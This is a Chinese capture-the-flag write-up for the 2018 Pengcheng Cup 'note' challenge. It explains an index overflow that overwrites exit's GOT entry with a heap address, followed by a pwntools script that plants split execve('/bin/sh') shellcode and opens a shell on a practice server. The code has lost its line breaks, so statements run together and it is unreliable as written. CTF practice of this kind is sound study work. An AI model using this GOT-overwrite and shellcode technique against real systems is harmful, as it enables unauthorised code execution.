鹏城杯_2018_note

鹏城杯_2018_note

首先，检查一下程序的保护机制

然后，我们用IDA分析一下，在edit功能里，index的值可以被nptr溢出覆盖，因此，我们可以控制index的值，这样，我们就可以在GOT里写入一个堆地址。

由于没有开启NX保护，我们只需要再在堆里布置shellcode即可。

#coding:utf8
from pwn import *context(os='linux',arch='amd64')
#sh = process('./2018_note')
sh = remote('node3.buuoj.cn',28075)def add(index,size,content):sh.sendline('1')sleep(0.01)sh.sendline(str(index))sleep(0.01)sh.sendline(size)sleep(0.01)sh.sendline(content)#溢出覆盖index，使得heap[i]对应exit的got表，这样就能将exit的got表修改为一个heap地址
payload = '13'.ljust(0xA,'\x00') + p32(0xFFFFFFF8)
sc1 = asm('''mov rax,0x0068732f6e69622fjmp $+0x16''')
add(0,payload,sc1)
sc2 = asm('''push raxxor rax,raxmov al,0x3Bmov rdi,rspjmp $+0x17''')
add(1,'13',sc2)sc3 = asm('''xor rsi,rsixor rdx,rdxsyscall''')
add(2,'13',sc3)
#getshell
sh.sendline('5')sh.interactive()

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！